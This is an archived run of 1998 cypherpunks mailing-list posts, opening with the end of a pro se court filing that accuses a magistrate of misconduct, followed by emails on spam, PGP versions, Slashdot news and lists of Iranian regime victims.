  the imposition of sanctions pursuant to Fed.R.Civ.P. 37

    IT IS THEREFORE ORDERED, ADJUDGED AND DECREED that
  Defendant's Motion to Strike and all of Plaintiff's First Set of Requests
  for Admissions to Various Employees of the National Security Agency
  and to Various Employees of Sandia National Laboratories is granted.

Svet cite no law or rules which prevent Plaintiffs' from requesting

admission from non-parties, therefore Plaintiff's must assume in the

interest of justice that Svet agrees with Plaintiff's procedure.

11  Svet ORDER FILED February 10, 1998 states

  THIS MATTER comes before the Court on Plaintiffs' Motion to Remove
  Docket Sheet Entry 14 and Associated Response file on June 24, 1997.
  The matter of discovery was addressed in and Order entered June 11,
  1997.  Thus, Plaintiff's Motion is moot.

  IT IS THEREFORE ORDERED, ADJUDGED AND DECREED that 
  Plaintiffs' Motion to Remove Docket Sheet Entry 14 and Associated
  Response is denied as moot.

Docket Sheet entry 14 posted 6/9/97 is

  RESPONSE  by defendant to motion to accept discovery plan of plaintiffs
  as an unopposed motion before the Court (dmw) [Entry date 06/10/97]

5/23/97 Docket Sheet entry 9 Plaintiffs file 

  MOTION by plaintiff for order to accept discovery plan (dmw)

Defiant misses filing date for response to entry 9.

Therefore, Plaintiffs' file on 6/9/97 Docket Sheet entry 13

  MOTION by plaintiff to accept discovery plan of plaintiffs are an   
  unopposed motion before the court (dwm)

In panic Defendant's lawyer US Mitchell submits on 6/9/97

Docket Sheet entry 14

  RESPONSE by defendant to motion to accept discovery plan of plaintiffs
  as an unopposed motion before the Court [13-1] (dwm) [Entry date
  06/10/97]

Lawyer Mitchell, apparently realizing her legal procedureal blunder, is 

forced to deposit her LATE MOTION in Court outside mailbox since entry was 

not until June 10.

  Svet, again, flaunts disregard for the Federal Rules of Civil Procedure 

by ORDER FILED February 10, 1998 by ruling late motion moot.

  Svet cites no authority to overrule dictates of Federal Rules of Civil 

Procedure, and even local court rules, on timeliness.

  Svet demonstrates again, IN WRITING, prejudice toward Defendant.

12 Svet NOT ONLY has shown,  IN WRITING, his attempt to inhibit the legal 

process specified in the Federal Rules of Civil Procedure but has engaged 

in a proactive process of attempting to retaliate against Plaintiffs' in 

their attempt to follow the Federal Rules of Civil Procedure.

  Svet NEVER attempted to clarify procedures or rules so that either side 

could correct any mistakes in civil procedure.

WHEREFORE

13  Plaintiffs' invoke 

  28 USC  455. Disqualification of justice, judge, or magistrate 

    (a) Any justice, judge, or magistrate of the United States shall 
    disqualify himself  in any proceeding in which his impartiality 
    might reasonably be questioned. ...

14  REMOVE judges Svet and Campos from this proceeding for clear
 
demonstration of pattern and practice of judicial misconduct IN

WRITING in this lawsuit.

15  ORDER judge Svet  RESTRAINED from awarding sanctions against

Plaintiffs.

16  APPOINT new magistrate and judge to begin this lawsuit DE NOVO.

17 GRANT such other relief as the Court may deem  just and proper.



Respectfully submitted, 
 
 
                    _________________________ 
                    William H. Payne             	   	     
                    13015 Calle de Sandias NE          	     
                    Albuquerque, NM 87111              	     
 
 			
                    _________________________				 
                    Arthur R. Morales                            
                    1024 Los Arboles NW                         
                    Albuquerque, NM 87107                        
 
                    Pro se litigants 
 
 
               CERTIFICATE OF SERVICE 
 
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to Jan E Mitchell, Assistant US Attorney, 
525 Silver SW, ABQ, NM 87102 this Thursday February 19,
1998.





7






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Feb 1998 01:49:25 +0800
To: cypherpunks@toad.com
Subject: Is spam really a problem?
Message-ID: <199802181733.SAA26244@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




I see discussion of spam here and everywhere on
the net. But who finds it a *real* problem, and
why?

I've been on the net for nearly 20 years. I'm
active on numerous mailing lists. I post to 
usenet. I have a website. In all cases 
(except this post) I use real email 
addresses.

Nevertheless, spam does not create a big problem
for me. Perhaps 10-15% of my home email is spam,
(much less at work) and I identify and kill it 
in less time than it takes me to sort out the 
junk from my snail mail.

Don't get me wrong; I don't *like* spam. But 
for me it's a minor problem, certainly not
worthy of legal remedies. I'm willing to suffer
a certain level of foolish annoyance gladly 
in return for liberty.

The only point at which spam is more than a 
minor irritation is when sexual spam turns up in
my home mail or in inappropriate news groups, 
and then only because I have young kids, who
I don't wish to be exposed to porn until they
are more mature (if you flame me on this, you're
missing the point of this post, and will be
ignored).

Masque.

PS: I'm slightly anonymous in this message
because I fear that if I used my real name,
some jerk would decide to sign me up for
every spam source on the planet, to prove
a point.

M
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 08:29:24 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: News & Truth (fwd)
Message-ID: <199802190033.SAA13743@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: News & Truth 
> Date: Wed, 18 Feb 98 16:07:00 -0800
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>

> a friend of mine is studying Hamilton vs. Jefferson. it turns out
> Hamilton loved newspapers and would write frequently under his own
> name, or under a variety of pseudonyms. one biographer states he
> assumed the personality of each as he wrote under them.  I think
> Jefferson was at ill advantage in the face of Hamilton's tactics.

Perhaps, but I doubt your proposing that history looks upon Hamilton
with equity to Jefferson. The ultimate winner of any discourse is the one
that history remembers.

Jefferson's Opinion of Hamilton:

That I have utterly in my private conversations disapproved of the system of
the Secretary of the Treasury, Alexander Hamilton, I acknowledge and avow;
and this was not a merely speculative difference. His system flowed from
principles adverse to liberty and was calculated to undermine and demolish
the republic, by creating an influence of his department over members of the
Legislature. I saw this influence actually produced, and its first fruits to
be the establishment of the greatest outlines of his project by the votes of
the very persons who, having swallowed his bait, were laying themselves out
to profit by his plans; and that had these persons withdrawn as those
interested in a question ever should, the vote of the disinterested majority
was clearly the reverse of what they made it. These were no longer then the
votes of the representatives of the people, but of deserters from the right
and interests of the people.

My objection to the Constitution was that it wanted a bill of rights
securing freedom of religion, freedom of press, freedom from standing
armies, trial by jury, and a constant Habeas Corpus act. Colonel Hamilton's
was that it wanted a king and a house of lords. The sense of America has
approved my objection and added the bill of rights, not the king and lords.
I also thought a longer term of service, nsusceptible of renewal would have
made a President more independant. My country has thought otherwise, and I
have aquiesced implicity. He wishes the general government should have power
to make laws binding the States in all cases whatever. Our country has
thought otherwise. Has he aquiesced?

Note: It is of some interest to note the capitalization in the final
      opinion, it is Jeffersons.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 08:35:08 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: New technology around the corner [slashdot.org] (fwd)
Message-ID: <199802190037.SAA13835@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 19 Feb 1998 01:21:32 +0100 (MET)
> Subject: Re: New technology around the corner [slashdot.org]
> From: nobody@REPLAY.COM (Anonymous)

> Tim May wrote:
> 
> > Or how about plastic cubes that can store terabytes....
> 
> 
> They work fine.  Just keep it in liquid nitrogen or you'll lose all your
> data.

This only applies to semiconductor systems. Also, liquid Nitrogen is cheaper
to purchase than beer, liter for liter. Also with Peltier devices it is quite
possible to keep such systems working for extended periods of time. Simply
review some of the Nitrogen based IR viewing systems that are being used by
amatuer astronomers.

However, there are technologies being worked on now, protein memory for
example, that offer equal 3d packing factors and don't require esoteric
cooling systems.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 19 Feb 1998 10:50:12 +0800
To: kalliste@aci.net>
Subject: the Court's private encryption key
Message-ID: <34EB9A94.42D4@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain



Wednesday 2/18/98 7:23 PM

J Orlin Grabbe
John Young

I just spoke with Bill Goldrick.

Read about Goldrick in Deep Black by William Burrows.

Goldrick was the Sandia supervisor who supervised installation
the Norwegian seismic system.  And supervised the second
data authenticator.  And reviewed my SAND report.

We talked about data authentication.  And its problems.

I looked at Svet's February 10, 1998 ORDER

And thought about

Digital File Stamp

 This document consists of an official stamp of the Court 
and, if attached to the document identified above, servers an
endorsed copy of the pleading.  It may be used in lieu of the Court's 
mechanical file stamp for the named document only, and
misuse will be treated the same as misuse of the Court's official 
mechanical file stamp.  The Court's digital signature is a verifiable 
mathematical computation unique to the filed document and the 
Court's private encryption key.  This signature assures
that any changes can be detected.

Think devious.  

By way of deception.

But this for later.

Allahu Akbar
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdew@el.nec.com (Bob De Witt)
Date: Thu, 19 Feb 1998 12:14:09 +0800
To: jkwilli2@unity.ncsu.edu
Subject: Re: bugged?
Message-ID: <199802190400.UAA13074@yginsburg.el.nec.com>
MIME-Version: 1.0
Content-Type: text/plain



TATTOOMAN,

Ken Williams <jkwilli2@unity.ncsu.edu> wrote on Wed Feb 18 10:28:21 1998:
> Breezy > On Tue, 17 Feb 1998, Breezy wrote:
> >Babu Mengelepouti wrote:
> >> Ken Williams wrote:
> >> > ...
> >> > I got pgp 5.0. which will not work with your version. Upgrade man :-)
> >> He's the one who needs to change his version... to 2.6.x
> >Why use 2.6.x vs 5.0?  Is 5.0 not as stable or something?  Not as good?
> >...
> >====/------ Breezy ----------------------------/ 
> >===/---- ebresie@ccwf.cc.utexas.edu ----------/ 
> >==/---- http://ccwf.cc.utexas.edu/~ebresie --/
> 
> PGP v2.6.2 for UNIX is RSA, and cannot decrypt anything crypted with 
> PGP v5.x.  v5.0 for UNIX features the DSS/Diffie-Hellman algorithm that
> all the other 5.x versions have.  v5.0 is stable, better, and is basically
> the current standard.  it is more script-friendly and has a better
> command-line.
> 
> basically, it really sucks when every encrypted message i have gotten in
> the past week was encrypted with RSA/DSS and i couldn't decrypt it with
> the v2.6.2 that is installed at work.  due to space limitations on my
> volume server and our nihilistic copyrighted software policy, my only
> solution/option at the moment is to bring my laptop to work just for
> message decryption.
> 
> i've sent in a software request for a PGP upgrade on the network, but due
> to the expensive PGP licensing agreements and the fact that we have close

NO, NO.  PGP licensing agreements are by the server, not by the client.  You
need 1 server in each local net, on an exported partition (drive).  Then the
users can run it from UNIX(NT).  You still have to combine the public keys 
onto a single keyring, but ...

BTW, arrange your contracts in two chuncks.  The small one has the high 
priced service agreement, and the large one has the licenses for the user
majority.

> to 50,000 active users, i don't expect anything to be done.
> 
> guess state employees don't have the right to privacy any more huh?
> and neither do the studnets here for that matter...
> 
> TATTOOMAN

Luck,

Bob De Witt,
rdew@el.nec.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 09:58:46 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Quantum transistor breakthrough? [slashdot.org]
Message-ID: <199802190203.UAA14286@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.slashdot.org/

>    Quantum Transitors Trumpeted! Contributed by mojoski on Wed Feb 18
>    20:08:01 1998 EST
>    [Technology] From the bragging-on-my-bro Dept
>    In what can only be described as a huge advance in quantum transitior
>    technolgy, The San Jose Mercury News is reporting that researchers at
>    Sandia National Laboratories have demonstrated a method of making
>    these devices stable enough for potential use in computing
>    applications.
>    
>    The Sandia quantum transistor is not the first to use a quantum
>    mechanical effect called ``tunneling'' to compute. Experimental
>    quantum tunneling devices were first made nearly a decade ago.
>    
>    But Sandia's is the first to be made using common manufacturing
>    techniques that would allow many of the devices to be strung together
>    to compute en masse, said physicist Jerry Simmons, leader of the
>    Sandia development team.
>    
>    And you know what the coolest part of this story is? Jerry Simmons is
>    my brother! Go man, go! I can only hope that he'll remember the little
>    people in his life when he sells this technology to chipmakers
>    world-wide! *wink*
>    Add a Comment?

>    Sco Emulates Win95 Contributed by CmdrTaco
>    Wed Feb 18 12:06:03 1998 EST
>    From the emulate-the-enemy dept.
>    joe wrote in to tell us that SCO now has a Win5 emulator available.
>    Read about it here. Between Wine, Wabi, OS/2 and others emulating 95,
>    it's getting closer and closer to a point where you can try a new OS
>    without giving up your old software. This is important stuff people.
>    Read More...
>    27 comment(s)

>    New DES Clients Contributed by CmdrTaco
>    [Encryption] Wed Feb 18 12:02:38 1998 EST
>    From the bits-and-bytes dept.
>    phi1abole wrote in to let us know that a new batch of Des Clients are
>    available for download. This gives me a good chance to once again plug
>    Slashdot's DES2 Team. We're ranked #8 overall. With over 2/3rds of the
>    keyspace searched, this contest is almost toast.
>    Read More...
>    5 comment(s)


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 19 Feb 1998 11:52:06 +0800
To: j orlin grabbe <kalliste@aci.net>
Subject: rushdie list
Message-ID: <34EBA748.689C@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Orlin

Best to try to keep off the list.

  August 1991, Shapour Bakhtiar and Soroush Katibeh are killed in  
Suresnes, France.

Title: Iranian Martyrs





This page is dedicated to all those who stood up against tyranny

KNOW THAT BEHIND EACH NUMBER, AND EACH NAME,
THERE IS A MAN, A WOMAN, A CHILD,
A FACE, A SMILE, A TEAR
PUT YOURSELF IN PLACE OF THE CONDEMNED AND
IMAGINE
THE SOLITUDE AND LONELINESS OF THE MOMENT
WHEN THEY COME TO TAKE THEM AWAY,
THIS LAST VOYAGE,
WHERE ARE YOU AT THIS VERY MOMENT, PARTISAN OF HUMAN RIGHTS ?
WHY HAS THE WORLD SUDDENLY BECOME A VAST
DESERT WHERE THERE EXISTS ONLY THE VICTIM AND HIS EXECUTIONERS ?
HOW MUCH LONGER CAN YOU STAY SILENT ?

Below is a list of all those who were affiliated to NAMIR  or its military wing - NEGHAB - and
were murdered by the Islamic Republic of Iran : 
Date         Location           Name                    
04/07/1980   Tehran             A.Mohagheghi (general)
04/07/1980   Tehran             G.Ghayeghran (non-commissioned officer : pilot)
04/07/1980   Tehran             F.Jahangiri (non-commissioned officer : pilot)
04/07/1980   Tehran             A.Kamiani 
04/07/1980   Tehran             A.Karimbar
30/07/1980   Tehran             H.Kazemi (non-commissioned officer)
30/071980    Tehran             M.Moradi (non-commissioned officer)
30/07/1980   Tehran             S.Norouzi (sergeant)
30/07/1980   Tehran             A.Mohamadi
30/07/1980   Tehran             M.Assangochai
30/07/1980   Tehran             Y.Mahboubian
30/07/1980   Tehran             E.Mamaghani
30/07/1980   Tehran             N.Sedarat
30/07/1980   Tehran             E.Baroukhim
30/07/1980   Tehran             M.B.Fard (lieutenant)
30/07/1980   Neyshabur          Y.Khadjeh
30/07/1980   Neyshabur          G.Jafari
31/07/1980   Tehran             M.Farzam (lieutenant)
31/07/1980   Tehran             H. Karimpurtari (non-commissioned officer)
31/07/1980   Tehran             D.Jalaii (colonel)
31/07/1980   Tehran             N.Yahyaii (lieutenant)
31/07/1980   Tehran             N.Najaf-Nejad (sergeant)
07/08/1980   Tehran             I. Soltani (corporal)
07/08/1980   Tehran             H.Lashkari (lieutenant-pilot)
07/08/1980   Tehran             M.Saghafi (lieutenant-pilot)
07/08/1980   Tehran             A.Zarineh (colonel)
07/08/1980   Tehran             H.Gohari (major)
07/08/1980   Tehran             K.Alizadeh (major)
07/08/1980   Tehran             A.Morvaridi (sergeant)
07/08/1980   Tehran             S.Pourfahmideh (lieutenant)
07/08/1980   Tehran             M.Najafabadi (lieutenant)
07/08/1980   Tehran             M.Zahedi (lieutenant)
07/08/1980   Tehran             M.Asgharian (non-commissioned officer)
07/08/1980   Tehran             H.Abedini
07/08/1980   Tehran             F.Azarian (lieutenant)
16/08/1980   Tehran             E.Arab-Shirazi
16/08/1980   Tehran             A.Awazzadeh 
16/08/1980   Tehran             M.Sajadi (non-commissioned officer)
16/08/1980   Tehran             M.Farahpour
16/08/1980   Tehran             Z.Momeni
16/08/1980   Tehran             G.Khergani (sergeant)
16/08/1980   Tehran             M.Kiani (sergeant)
16/08/1980   Tehran             D.Bakhtiar
16/08/1980   Tehran             G.NaghibZadeh (non-commissioned officer)
16/08/1980   Tehran             H.Zamanpour (flight-lieutenant)
16/08/1980   Tehran             K.Azartash (major)
16/08/1980   Tehran             A.Azmudeh (colonel)
16/08/1980   Tehran             C.Ahmadi (lieutenant)
16/08/1980   Tehran             S.Mahdiun (general-pilot)
16/08/1980   Tehran             M.Farnejad (non-commissioned officer)
16/08/1980   Tehran             K.Mohamadi-Koubaii (non-commissioned officer)
16/08/1980   Tehran             M.Tightiz (non-commissioned officer)
18/08/1980   Tehran             M.Mirlaki (non-commissioned officer)
18/08/1980   Tehran             M.Abedini-Moghadam (non-commissioned officer0
18/08/1980   Tehran             K.Rahmati (non-commissioned officer)
18/08/1980   Tehran             P.Bayani (non-commissioned officer)
18/08/1980   Tehran             L.Lotfolahi (non-commissioned officer)
18/08/1980   Tehran             A.Habibi (lieutenant)
18/08/1980   Tehran             N.Zandi (flight lieutenant pilot)
18/08/1980   Tehran             C.Karimian (sergeant)
18/08/1980   Tehran             O.Boyeri (flight lieutenant)
18/08/1980   Tehran             A.Soleimani (flight lieutenant)
18/08/1980   Tehran             D.Mazaheri-Kashani
18/08/1980   Tehran             D.Fatehjou (non-commissioned officer)
18/08/1980   Tehran             A.Pourkarbassi-Dehi (non-commissioned officer)
18/08/1980   Tehran             D.Fateh-Firouz (non-commissioned officer)
18/08/1980   Tehran             K.Afrouz (flight lieutenant)
18/08/1980   Tehran             M.Azimifar (flight lieutenant)
21/08/1980   Tehran             M.Arad (lieutenant)
21/08/1980   Tehran             M.Sadeghi (colonel)
21/08/1980   Tehran             H.Izadi (colonel)
21/08/1980   Tehran             Asghari
25/08/1980   Tehran             D.Rahbar (non-commissioned officer)
25/08/1980   Tehran             G.Hamedani (non-commissioned officer)
25/08/1980   Tehran             F.Javaherian (non-commissioned officer)
25/08/1980   Tehran             M.Zade-Naderi (non-commissioned officer)
26/08/1980   Tehran             G.Hejazi (female)
26/08/1980   Tehran             D.Shomali
26/08/1980   Tehran             H.Ahmadi
26/08/1980   Esfahan            M.Altani
26/08/1980   Esfahan            H.Karimi
26/08/1980   Esfahan            S.Mozaii
26/08/1980   Esfahan            H.Dari
26/08/1980   Esfahan            A.Allahverdi
26/08/1980   Esfahan            S.Hemati
26/08/1980   Esfahan            M.Vesaali
26/08/1980   Esfahan            B.Nikbakht (female)
26/08/1980   Esfahan            E.Biglari
26/08/1980   Esfahan            J.Hemati
26/08/1980   Esfahan            E.Karimi
26/08/1980   Esfahan            M.Karimi
28/08/1980   Tehran             S.Bassani (female)
28/08/1980   Tehran             M.T.Bahrami (non-commissioned officer)
29/08/1980   Tehran             A.Almasi (lieutenant)
29/09/1980   Tehran             H.Haleki (lieutenant)
29/08/1980   Tehran             M.R.Javadi (lieutenant)
29/08/1980   Tehran             H.Ahmadi (non-commissioned officer)
29/08/1980   Tehran             J.Ranjbar (non-commissioned officer)
30/08/1980   Tehran             A.Azizian (major)
30/08/1980   Tehran             R.Soltani (colonel)
30/08/1980   Tehran             A.Faria (colonel)
30/08/1980   Tehran             I.Derakhshandeh (non-commissioned officer)
30/08/1980   Tehran             M.Bahrami
30/08/1980   Tehran             S.Shahbeui (colonel)
30/08/1980   Tehran             I.Khalafbegi (major)
30/08/1980   Tehran             K.Keyvanfar
30/08/1980   Ahwaz              M.Borati (corporal)
30/08/1980   Ahwaz              I.Marvdashti (non-commissioned officer)
30/08/1980   Ahwaz              R.Yahyapasand (lieutenant)
30/08/1980   Ahwaz              M.A.Mehrabi (non-commissioned officer)
30/08/1980   Ahwaz              O.Atashboro
30/08/1980   Ahwaz              S.Sotoudeh
01/09/1980   Tehran             D.Asghari (officer)
01/09/1980   Tehran             D.Raastgu (lieutenant)
01/09/1980   Tehran             M.Fatahi-Nourdehi (non-commissioned officer)
03/09/1980   Ahwaz             M.Hokmabadtchi (sergeant)
03/09/1980   Ahwaz             E.Ostad-Nazari (lieutenant)
03/09/1980   Ahwaz             F.Reissi (lieutenant)
03/09/1980   Ahwaz             S.Dehgan (lieutenant)
09/09/1980   Tehran            M.Sayah (sergeant)
09/09/1980   Tehran            M.Rahbai-Nejad (lieutenant)
09/09/1980   Tehran            M.Tajvari (lieutenant)
09/09/1980   Tehran            B.Partovi (major)
09/09/1980   Tehran            H.Mostafavi 
11/09/1980   Tehran            K.Atri
11/09/1980   Tehran            M.Sadeghi (colonel)
11/09/1980   Tehran            M.Sohaneki
11/09/1980   Tehran            N.Morovati (lieutenant)
11/09/1980   Tehran            N.Sajadi (non-commissioned officer)
11/09/1980   Tehran            A.Mohammad (soldier)
11/09/1980   Tehran            A.Shafigh (flight lieutenant)
16/09/1980   Tehran            M.Tabrizi-Khatun
16/09/1980   Tehran            E.Azadighaneh (non-commissioned officer)
16/09/1980   Tehran            M.Jalali-Ghajar (major)
16/09/1980   Tehran            S.Nour
13/071981    Tehran            M.Khadem
10/08/1981   Tehran            Amir-Tahmasbi (major)
10/08/1981   Tehran            A.Abdolmalek-Pour (colonel)
10/08/1981   Tehran            Didehvar (colonel)
10/08/1981   Tehran            Mohajeri
23/12/1981   Tehran            R.Marzban
23/12/1981   Tehran            A.Mohebi
30/01/1982   Tehran            A.Amir-Tahmasbi (colonel)
30/01/1982   Tehran            K.Yarahmadi
30/01/1982   Tehran            E.Seyrafi (colonel)
30/01/1982   Tehran            A.Foroughi (colonel)
30/01/1982   Tehran            A.Abdol-Malekpour
30/01/1982   Tehran            G.Rahimi (colonel)
30/01/1982   Tehran            M.Sabah (colonel)
30/01/1982   Tehran            G.Biglou
30/01/1982   Tehran            A.Mohajeri
30/01/1982   Tehran            M.Lotfzari
30/01/1982   Tehran            G.Naghib-Manesh
30/01/1982   Tehran            G.Didehvar (colonel)
30/01/1982   Tehran            G.Shahandeh-Ashtiani
30/01/1982   Tehran            M.Khashayar
11/09/1982   Tehran            R.Shahbakhti
11/09/1982   Tehran            H.Moghbelzadeh

 of these victims, none had the rights 
 of an accused as foreseen in 
 the Universal Declaration of  Human Rights 
.............................................


Report on the Islamic Republic's Terrorism abroad
   
Since the advent of the Islamic Republic in Iran, terrorist attempts have targeted exiled Iranians as well as citizens
of other countries, condemned as heretics, around the world.  These attacks were ordered by the Islamic government 
of Iran.
   

1. In July 1980, Shapour Bakhtiar escapes an assassination attempt in Paris, France.  A French policeman and a 
    neighbor are killed and one policeman is seriously injured.
2. In July 1980, Ali Tabatabai is killed in Washington D.C., United States.
3. In 1981, Shahriar Shafigh is killed in Paris, France.
4. In January 1982, Shahrokh Missaghi is killed in Manila, Philippines.
5. In April 1982, a young German student is killed during the attack of the residence of Iranian students in Mainzer,
    Germany, by the pro-Iranian Hezbollah.
6. In June 1982, Shahram Mirani is fatally wounded in India.
7. In August 1982, Ahmad Zol-Anvar is fatally wounded in Karachi, Pakistan.
8. In September 1982, Abdolamir Rahdar is killed in India.
9. In 1982, Colonel Ahmad Hamed is killed in Istanbul, Turkey.
10. In February 1983, Esfandiar Rahimi is killed in Manila, Philippines.
11. In February 1984, Gholam-Ali Oveissi and his brother, Gholam-Hossein, are killed in Paris, France.
12. In August 1985, Behrouz Shahverdilou is killed in Istanbul, Turkey.
13. In December 1985, Hadi Aziz-Moradi is killed in Istanbul, Turkey.
14. In August 1986, Bijan Fazeli is killed in London, Great Britain.
15. In December 1986, Vali Mohammad Van is killed in Pakistan.
16. In January 1987, Ali-Akbar Mohammadi is killed in Hamburg, Germany.
17. In May 1987, Hamid Reza Chitgar disappears in Vienna, Austria and is found assassinated in July.
18. In July 1987, Faramarz-Agha and Ali-Reza Pourshafizadeh are killed and twenty-three persons 
      are wounded in residences of Iranian refugees Karachi and Quetta, Pakistan.
19. In July 1987, Amir-Hossein Amir-Parviz is seriously wounded by the explosion of a bomb placed in his car
      in London, England.
20. In July 1987, Mohammad-Hassan Mansouri is shot dead in his house Istanbul, Turkey.
21. In August 1987, Ahmad Moradi-Talebi is killed in Geneva, Switzerland.
22. In October 1987, Mohammad-Ali Tavakoli-Nabavi and his youngest son, Noureddin, are killed in 
      Wembley,  Great Britain.
23. In October 1987, Abol-Hassan Modjtahed-Zadeh is kidnapped in Istanbul, Turkey. 
24. In December 1988, an Iranian refugee is assassinated in front of the headquarters of the United Nations High 
      Commissioner for Refugees in Karachi, Pakistan.
25. In June 1989, Ataollah Bay Ahmadi is killed in the Emirate of Dubai.
26. In July 1989, Abdol-Rahman Ghassemlou and Abdollah Ghaderi and Fazel Rassoul are killed in Vienna, Austria.
27. In August 1989, Gholam Keshavarz is killed in Cyprus.
28. In September 1989, Sadigh Kamangar is assassinated in the north of Iraq.
29. In September 1989, Hossein Keshavarz, victim of a terrorist attempt, is paralyzed for life.
30. In February 1990, Hadj Baloutch-Khan is killed by a terrorist commando in Pakistan.
31. In Mars 1990, Hossein Mir-Abedini is wounded by an armed commando in the airport of Istanbul, Turkey.
32. In April 1990, Kazem Radjavi is killed in Coppet, Switzerland.
33. In July 1990, Ali Kashefpour is kidnapped and killed in Turkey.
34. In September 1990, Efat Ghazi is killed in Sweden by a bomb intended for her husband.
35. In October 1990, Cyrus Elahi is killed in Paris, France.
36. In April 1991, Abdol-Rahman Boroumand is killed in Paris, France.
37. In July 1991, Alberto Capriolo is wounded in Milan, Italy.
38. In July 1991, Hitoshi Igarashi is killed in Tokyo, Japan.
39. In July 1991, Ahad Agha is killed in Suleimanya, iraq.
40. In August 1991, Shapour Bakhtiar and Soroush Katibeh are killed in Suresnes, France.
41. In September 1991, Sad Yazdan-Panah is fatally wounded in iraq.
42. In December 1991, Massoud Rajavi escapes a terrorist attempt in Baghdad, iraq.
43. In January 1992, Kamran Hedayati is wounded opening a letter bomb in Vastros, Sweden.  He looses his 
      sight and his hands.
44. In May 1992, Shapour Firouzi is killed in Iraq.
45. In July 1992, Kamran Mansour-Moghadam is killed in Suleymania, Iraq.
46. In August 1992, Fereydoun Farokhzad is killed in Bonn, Germany.
47. In September 1992, Sadegh Sharafkandi, Fatah Abdoli, Homayoun Ardalan and Nouri Dehkordi are killed in 
      Berlin, Germany.
48. In January 1993, Ugur Mumcu is killed in Ankara, Turkey.
49. In February 1993, the fundamentalist terrorists in Turkey admit to have kidnapped and killed Ali-Akbar Ghorbani
      who had disappeared in June 1992 in Turkey.
50. In March 1993, Mohammad-Hossein Naghdi is killed in Rome, Italy.
51. In June 1993, Mohammad-Hassan Arbab is killed in Karachi, Pakistan
52. In October 1993, Turkish fundamentalists admit having tortured and killed for Iranian officials, Abbas Gholizadeh
      who was kidnapped in Istanbul, Turkey in December 1992.
53. In November 1993, William Nygaard is wounded in Oslo, Norway.
54. In January, 1994, Taha Kermanj is killed in Corum, Turkey. 
55. In August 1994, Ghafour Hamzei'i is killed in Baghdad, iraq.
56. In February 1996, Zahra Rajabi and Ali Moradi were killed in Istanbul, Turkey.
57. In March 1996, Ali Mollazadeh was killed in Karachi, Pakistan. 
58. In May 1996, Reza Mazlouman ( Kourosh Aryamanesh) was killed in Paris, France.

Due to the lack of reliable information, this list of terrorist attempts is not exhaustive. Undoubtedly, since the 
advent of the Islamic Republic, the number of extra-judicial executions outside Iran, in particular in Pakistan, 
Turkey and Iraq is higher.  Also, this report deliberately leaves out well known terrorist attacks ordered by Tehran, 
such as: the hostage crisis of the US embassy in Tehran in 1979; the kidnapping of British, American and French 
citizens in Lebanon by pro-Iranian Hezbollah; the explosive attack on the American and French military headquarters
in Lebanon, which were publicly claimed by Mohsen Rafighdoust, then head of the Revolutionary Guards  ; the wave 
of terrorist bombing in Paris in 1986, which resulted in the death of 13 persons and the wounding of hundreds of 
others; the death sentence against Salman Rushdie for writing The Satanic Verses; and the Dahran terrorist attempts
that targeted the American military in Saudi Arabia.



Title: NSA, Crypto AG, and the Iraq-Iran Conflict




 [Email Reply] 


NSA, Crypto AG, and the Iraq-Iran Conflict


          by J. Orlin Grabbe




	One of the dirty little secrets of the 1980s is that 
